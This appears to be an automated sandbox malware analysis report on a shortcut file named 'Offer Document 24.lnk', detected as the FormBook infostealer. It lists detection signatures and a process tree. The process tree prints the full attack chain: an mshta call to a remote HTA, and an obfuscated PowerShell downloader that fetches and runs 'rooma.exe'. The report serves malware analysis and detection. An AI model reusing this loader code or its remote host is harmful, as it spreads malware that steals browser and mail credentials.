Edit tour
Windows
Analysis Report
Offer Document 24.lnk
Overview
General Information
| Sample name: | Offer Document 24.lnk |
| Analysis ID: | 1446727 |
| MD5: | bf9569f5e56e6dcb1f4ae60fd2faea36 |
| SHA1: | 1085e4140bf323df085db50b8f79c3b02b4aab72 |
| SHA256: | 59f149ffc55554ce0aac7072bba999b5abb83b023486e017f407883f8a27e4e2 |
| Tags: | lnk |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected FormBook
AI detected suspicious sample
Found URL in windows shortcut file (LNK)
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
powershell.exe (PID: 5872 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" . $env:C:\ W*\S*2\m*h ?a.* 'http ://20.86.1 28.223/roo m/room4.ht a' MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6984 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
mshta.exe (PID: 7268 cmdline: "C:\Window s\System32 \mshta.exe " http://2 0.86.128.2 23/room/ro om4.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function L Qhlh($iAXO UnjQ, $bjG cHEb){[IO. File]::Wri teAllBytes ($iAXOUnjQ , $bjGcHEb )};functio n zkkoODnk dOXlr($iAX OUnjQ){if( $iAXOUnjQ. EndsWith(( KgQIevZJx @(47125,47 179,47187, 47187))) - eq $True){ rundll32.e xe $iAXOUn jQ }elseif ($iAXOUnjQ .EndsWith( (KgQIevZJx @(47125,4 7191,47194 ,47128))) -eq $True) {powershel l.exe -Exe cutionPoli cy unrestr icted -Fil e $iAXOUnj Q}elseif($ iAXOUnjQ.E ndsWith((K gQIevZJx @ (47125,471 88,47194,4 7184))) -e q $True){m isexec /qn /i $iAXOU njQ}else{S tart-Proce ss $iAXOUn jQ}};funct ion fbUysI vJpUzDJbgt ($WeuPtAwB rGuTyyLeSB EJ){$TPKep UYDmoAFjOH RfuEf = Ne w-Object ( KgQIevZJx @(47157,47 180,47195, 47125,4716 6,47180,47 177,47146, 47187,4718 4,47180,47 189,47195) );[Net.Ser vicePointM anager]::S ecurityPro tocol = [N et.Securit yProtocolT ype]::TLS1 2;$bjGcHEb = $TPKepU YDmoAFjOHR fuEf.Downl oadData($W euPtAwBrGu TyyLeSBEJ) ;return $b jGcHEb};fu nction KgQ IevZJx($eT HmOcKqIU){ $kIWXaGUQZ Ybt=47079; $PDFpjjruz XwZezIX=$N ull;foreac h($QNJiuRD s in $eTHm OcKqIU){$P DFpjjruzXw ZezIX+=[ch ar]($QNJiu RDs-$kIWXa GUQZYbt)}; return $PD FpjjruzXwZ ezIX};func tion iMoBw PUgEkDDhYs (){$bzNVNM xsa = $env :AppData + '\';$fLao d = $bzNVN Mxsa + 'ro oma.exe'; if (Test-P ath -Path $fLaod){zk koODnkdOXl r $fLaod;} Else{ $mov KnuBo = fb UysIvJpUzD Jbgt (KgQI evZJx @(47 183,47195, 47195,4719 1,47137,47 126,47126, 47129,4712 7,47125,47 135,47133, 47125,4712 8,47129,47 135,47125, 47129,4712 9,47130,47 126,47193, 47190,4719 0,47188,47 126,47193, 47190,4719 0,47188,47 176,47125, 47180,4719 9,47180)); LQhlh $fLa od $movKnu Bo;zkkoODn kdOXlr $fL aod;};;;;} iMoBwPUgEk DDhYs; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
rooma.exe (PID: 7536 cmdline: "C:\Users\ user\AppDa ta\Roaming \rooma.exe " MD5: 1DCCE19E1A6306424D073487AF821FF0) 
TmjHHkXnMrncRmISMzN.exe (PID: 4472 cmdline: "C:\Progra m Files (x 86)\QiaIEk SaKRjYgraA ccrwCxYevA doYwcGJiVi CUCiHSVvXq yFaUAdZZI\ TmjHHkXnMr ncRmISMzN. exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) - netbtugc.exe (PID: 7792 cmdline:
"C:\Window s\SysWOW64 \netbtugc. exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146) - TmjHHkXnMrncRmISMzN.exe (PID: 3780 cmdline:
"C:\Progra m Files (x 86)\QiaIEk SaKRjYgraA ccrwCxYevA doYwcGJiVi CUCiHSVvXq yFaUAdZZI\ TmjHHkXnMr ncRmISMzN. exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) 
firefox.exe (PID: 8128 cmdline: "C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- svchost.exe (PID: 7576 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Click to see the 12 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
System Summary |   |
|---|
| Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): | ||